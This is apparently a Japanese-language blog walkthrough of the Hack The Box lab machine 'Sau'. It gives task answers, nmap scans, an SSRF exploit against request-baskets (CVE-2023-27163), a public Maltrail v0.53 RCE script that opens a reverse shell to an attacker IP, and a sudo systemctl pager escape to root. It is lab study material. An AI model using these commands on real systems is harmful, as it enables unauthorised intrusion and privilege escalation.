banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶場 Sau

htb-Sau(study)#

靶机 ip:10.10.11.224

About Sau

「Sau」は難易度が簡単な Linux マシンで、「Request Baskets」インスタンス上に存在するCVE-2023-27163の脆弱性を利用したサーバーサイドリクエストフォージェリ(SSRF)問題があります。この脆弱性を利用することで、未承認の OS コマンドインジェクション脆弱性を持つ「Maltrail」インスタンスにアクセスし、「puma」ユーザーとしてそのマシン上でリバースシェルを取得できます。その後、「sudo」の誤った設定を利用することで、「root」シェルを取得できます。

task1 目標マシンが開放している最大 tcp ポートは何ですか?

55555

nmap -sT 10.10.11.224

79568d8cd8fb4e8c6dac72c92c1f4880_MD5

task2 ポート 55555 上のアプリケーションはどのオープンソースソフトウェアによってサポートされていますか?

nmap -p55555 -sV 10.10.11.224

ポート 55555 のアプリケーションにアクセス

http://10.10.11.224:55555/web

9f22418a2954895d926d9f2e5cea27d4_MD5

request-baskets

task3 Sau 上で動作している request-baskets のバージョンは何ですか?

task2 のスクリーンショットから、request-baskets の現在のバージョンは1.2.1です。

task4 request-basketsには SSRF 脆弱性がありますが、CVE 番号は何ですか?

Google でアプリ名とバージョン番号を検索すれば見つかります。

f6e31aa14f48f8dbe5bc05d52be73f6d_MD5

CVE-2023-27163

task5 ポート 80 で動作しているアプリケーションはどのソフトウェアによってサポートされていますか?

ここでは SSRF 脆弱性を利用して内部ネットワークのポート 80 にアクセスする必要があります。nmap でポートをスキャンしてもアクセスできません。

43ad9ee5c658ae3511e2c61c997aeef8_MD5

参考:https://sploitus.com/exploit?id=6BAA524E-16EA-562C-804B-113B8244C6EA、このスクリプトを使用してトラフィックをポート 80 にプロキシできます。

wget https://raw.githubusercontent.com/Rubioo02/CVE-2023-27163/main/CVE-2023-27163.sh
chmod +x CVE-2023-27163.sh
./CVE-2023-27163.sh -t <TARGET_URL> -a <ATTACKER_URL>

d05962feb570d9a9383238e4345ba837_MD5

指定されたリンクにアクセス:http://10.10.11.224:55555/vxctgy、以下の図のように、**Maltrail** アプリケーションが表示されます。

f37a23ed9cefdad4c85afc7783436003_MD5

36f6bb711a27819dd26a930cc01873da_MD5

task6 MailTrail v0.53 には未認証のコマンドインジェクション脆弱性があります。その利用パスを見つけてください。

Powered by Maltrail (v0.53)

ディレクトリトラバーサルを試みます。

d13cdd3e6bfc60ef94e11ca892374a4e_MD5

提出を試みると、/login であることがわかります。poc を確認すると、https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py が見つかります。

task7 Sau 上で、Mailtrack アプリケーションはどのシステムユーザーとして実行されていますか?

https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py スクリプトを使用して RCE を実行します。

python3 exploit.py 10.10.14.10 1234 http://10.10.11.224:55555/vxctgy

nc でリスニング:

ca753a518ea64d5d5374fb59f10e5945_MD5

つまり、puma ユーザーです。

user のフラグを提出

fc03d8c1ea7e0ae81e6e553c43fddcc4_MD5

task9 Sau 上で、puma ユーザーが root として実行しているバイナリファイルの完全なパスは何ですか(パラメータなし)?

/usr/bin/systemctl

da6d582355a72d142df61a2e3b8f7f2c_MD5

task10 Sau にインストールされている systemd インスタンスの完全なバージョン文字列は何ですか?

9553d660ae49333de57377329a3aeae6_MD5

systemd 245 (245.4-4ubuntu3.22)

task11 このバージョンの systemd には特権昇格の CVE 脆弱性がありますが、CVE 番号は何ですか?

CVE-2023-26604

参考:https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7

root のフラグを提出

sudo /usr/bin/systemctl status trail.service

!sh

54985a96b339fc4efa97f80c2ad8b337_MD5

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。